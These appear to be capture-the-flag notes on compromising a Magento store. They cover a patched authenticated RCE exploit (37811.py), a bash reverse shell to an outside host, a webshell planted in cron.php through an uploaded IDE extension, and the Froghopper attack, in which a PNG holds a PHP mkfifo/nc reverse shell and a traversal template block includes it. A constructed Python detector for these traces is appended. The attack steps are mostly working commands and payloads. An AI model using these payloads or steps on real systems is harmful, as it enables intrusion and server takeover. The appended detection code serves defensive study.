-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...' ..from local.xml
-------------------
Errors:
ippsec used the full path to the admin page, which fixed this:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami'
-------------------
Other bloggers updated the form-control lookups to these lines:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password
-------------------
More errors, had to update the period in the request from 72 to 2y:
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
-------------------
python 37811.py http://$IP "whoami" ..error
python 37811.py http://$IP/index.php/admin/ "whoami" ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"
nc -nvlp 5555
whoami
www-data
-------------------
Upload IDE
Requires Admin login
System > Magento Connect > Magento Connect Manager > Upload
---------------
http://$IP/index.php/admin/
Login with Admin
System > Magento Connect > Magento Connect Manager
Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
Download:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz
---------------
System > Filesystem > IDE
Edit "Cron.php"
Update it with an evil php webshell
Get your shell
http://10.x.x.x/cron.php
Submit a python reverse shell
nc -nvlp 4444
whoami
www-data
-------------------
Froghopper Attack (RCE)
Requires Admin login
Upload an evil png with shellcode
Enable Symlinks
Edit Newsletter to call the payload
http://swagshop.htb/index.php/admin/
Login with Admin
-------------------
Create evil png
echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png
-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"
-------------------
Catalog > Manage Categories > New Category
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png ..confirm it worked!
-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type=’core/template’ template=’../../../../../../media/catalog/category/shell.php.png’}}
-------------------
Preview the template to execute the symlinked evil PNG
nc -nvlp 4444
whoami
www-data
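Added example, not part of these notes or of any Magento tooling: a small Python detector for the three traces the steps above leave behind (the dashboard tab_orders request, a double-extension file under media/catalog/category, web hits on cron.php, and a newsletter template that climbs out of the theme directory). The log lines, rule names and regexes are constructed for this example and assume a combined-format access log.

```python
import re

# Constructed for this example: indicators taken from the steps in the notes
# above, not from any real Magento deployment. Tune to your own environment.
LOG_RULES = [
    # dashboard orders-tab request that 37811.py drives (period value may vary)
    ("tab_orders-period-request", re.compile(r"/block/tab_orders/period/")),
    # double-extension upload landing in the category thumbnail directory
    ("double-ext-category-media",
     re.compile(r"/media/catalog/category/[^ ]+\.php\.[a-z0-9]+", re.I)),
    # cron.php is normally run by the scheduler, so web hits deserve review
    ("cron-php-web-hit", re.compile(r'"(?:GET|POST) /cron\.php')),
]

# Newsletter template content that loads a core/template block via a
# relative path climbing out of the theme directory (the Froghopper step).
TEMPLATE_RULE = re.compile(
    r"\{\{\s*block\s+type=['\"\u2019]core/template['\"\u2019]\s+"
    r"template=['\"\u2019][^'\"\u2019}]*\.\./", re.I)

# combined-format access log line: client, timestamp, request, status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# Constructed sample log lines (no real host); the last line is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [08/May/2019:10:01:02 +0000] "POST /index.php/admin/block/tab_orders/period/2y/?isAjax=true HTTP/1.1" 200 512
10.0.0.5 - - [08/May/2019:10:01:09 +0000] "GET /media/catalog/category/shell.php.png HTTP/1.1" 200 40
10.0.0.5 - - [08/May/2019:10:02:30 +0000] "GET /cron.php HTTP/1.1" 200 0
10.0.0.9 - - [08/May/2019:10:04:00 +0000] "GET /media/catalog/category/banner.png HTTP/1.1" 200 9000
"""

# constructed template content mirroring the block directive in the notes
SUSPICIOUS_TEMPLATE = ("{{block type='core/template' "
                       "template='../../../../../../media/catalog/category/shell.php.png'}}")


def scan_access_log(lines):
    """Return one hit dict per (line, rule) match; unparseable lines are skipped."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for name, rule in LOG_RULES:
            if rule.search(line):
                hits.append({"rule": name, "ip": m["ip"], "ts": m["ts"],
                             "status": m["status"], "request": m["req"]})
    return hits


def template_is_suspicious(content):
    """True when newsletter template content pulls a block from outside the theme."""
    return TEMPLATE_RULE.search(content) is not None
```

Run the two functions over your real access log and over the newsletter_template table contents; a hit on the category-media or template rule is worth an immediate look, the other two need correlation with who was logged into the admin panel at the time.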